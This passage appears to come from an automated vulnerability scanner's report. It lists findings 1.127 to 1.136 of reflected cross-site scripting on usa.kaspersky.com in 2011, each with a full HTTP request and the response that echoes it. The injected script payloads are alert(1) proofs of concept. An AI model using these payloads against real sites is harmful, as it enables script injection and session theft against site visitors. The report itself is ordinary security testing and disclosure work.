GET /products-services/home-computer-securitya91a9"-alert(1)-"929e765b02d/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:02:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141359"
Content-Type: text/html; charset=utf-8
Content-Length: 40677
Date: Sun, 04 Sep 2011 13:02:49 GMT
X-Varnish: 1163115535
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-securitya91a9"-alert(1)-"929e765b02d/pure?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.127. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fedd"><script>alert(1)</script>9235e22f1fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security6fedd"><script>alert(1)</script>9235e22f1fb/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:35 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141295"
Content-Type: text/html; charset=utf-8
Content-Length: 39595
Date: Sun, 04 Sep 2011 13:01:50 GMT
X-Varnish: 1163114026
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security6fedd"><script>alert(1)</script>9235e22f1fb/pure?ICID=INT1673886" />
...[SNIP]...

1.128. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4455"><script>alert(1)</script>c974b3a38d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/puree4455"><script>alert(1)</script>c974b3a38d1?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:04:21 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141461"
Content-Type: text/html; charset=utf-8
Content-Length: 38838
Date: Sun, 04 Sep 2011 13:04:28 GMT
X-Varnish: 1163118395
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/puree4455"><script>alert(1)</script>c974b3a38d1?ICID=INT1673886" />
...[SNIP]...

1.129. http://usa.kaspersky.com/products-services/home-computer-security/pure [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3516d"-alert(1)-"539626fa5f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/pure3516d"-alert(1)-"539626fa5f8?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141503"
Content-Type: text/html; charset=utf-8
Content-Length: 40379
Date: Sun, 04 Sep 2011 13:05:14 GMT
X-Varnish: 1163119547
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
eName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/pure3516d"-alert(1)-"539626fa5f8?ICID=INT1673886";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.130. http://usa.kaspersky.com/products-services/home-computer-security/pure [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b09c3"><script>alert(1)</script>346be129cf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/pure?ICID=INT1673886&b09c3"><script>alert(1)</script>346be129cf5=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:51:22 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140682"
Content-Type: text/html; charset=utf-8
Content-Length: 107162
Date: Sun, 04 Sep 2011 12:51:33 GMT
X-Varnish: 1163095907
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886&b09c3"><script>alert(1)</script>346be129cf5=1" />
...[SNIP]...

1.131. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79397"><script>alert(1)</script>d1dc6a9e10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services79397"><script>alert(1)</script>d1dc6a9e10c/home-computer-security/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142003"
Content-Type: text/html; charset=utf-8
Content-Length: 40598
Date: Sun, 04 Sep 2011 13:13:30 GMT
X-Varnish: 1163134441
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services79397"><script>alert(1)</script>d1dc6a9e10c/home-computer-security/tablet-security" />
...[SNIP]...

1.132. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d244"-alert(1)-"79edbca8ad5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services3d244"-alert(1)-"79edbca8ad5/home-computer-security/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:13:48 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142028"
Content-Type: text/html; charset=utf-8
Content-Length: 39984
Date: Sun, 04 Sep 2011 13:13:50 GMT
X-Varnish: 1163135362
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services3d244"-alert(1)-"79edbca8ad5/home-computer-security/tablet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.133. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07ce"><script>alert(1)</script>42a4c5f2575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securitye07ce"><script>alert(1)</script>42a4c5f2575/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:14:41 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142081"
Content-Type: text/html; charset=utf-8
Content-Length: 40666
Date: Sun, 04 Sep 2011 13:14:47 GMT
X-Varnish: 1163137262
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securitye07ce"><script>alert(1)</script>42a4c5f2575/tablet-security" />
...[SNIP]...

1.134. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f780"-alert(1)-"e86bf53504a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security3f780"-alert(1)-"e86bf53504a/tablet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:15:00 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142100"
Content-Type: text/html; charset=utf-8
Content-Length: 40757
Date: Sun, 04 Sep 2011 13:15:04 GMT
X-Varnish: 1163137923
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security3f780"-alert(1)-"e86bf53504a/tablet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.135. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0c99"-alert(1)-"685c02abd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/tablet-securitya0c99"-alert(1)-"685c02abd53 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Internet%20Security; s_nr=1315139125770-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Internet%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Ftablet-security%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:16:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315142173"
Content-Type: text/html; charset=utf-8
Content-Length: 40821
Date: Sun, 04 Sep 2011 13:16:17 GMT
X-Varnish: 1163140388
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/tablet-securitya0c99"-alert(1)-"685c02abd53";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.136. http://usa.kaspersky.com/products-services/home-computer-security/tablet-security [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/tablet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25dc"><script>alert(1)</script>d322e4cce32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/tablet-securityb25dc"><script>alert(1)</script>d322e4cce32 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
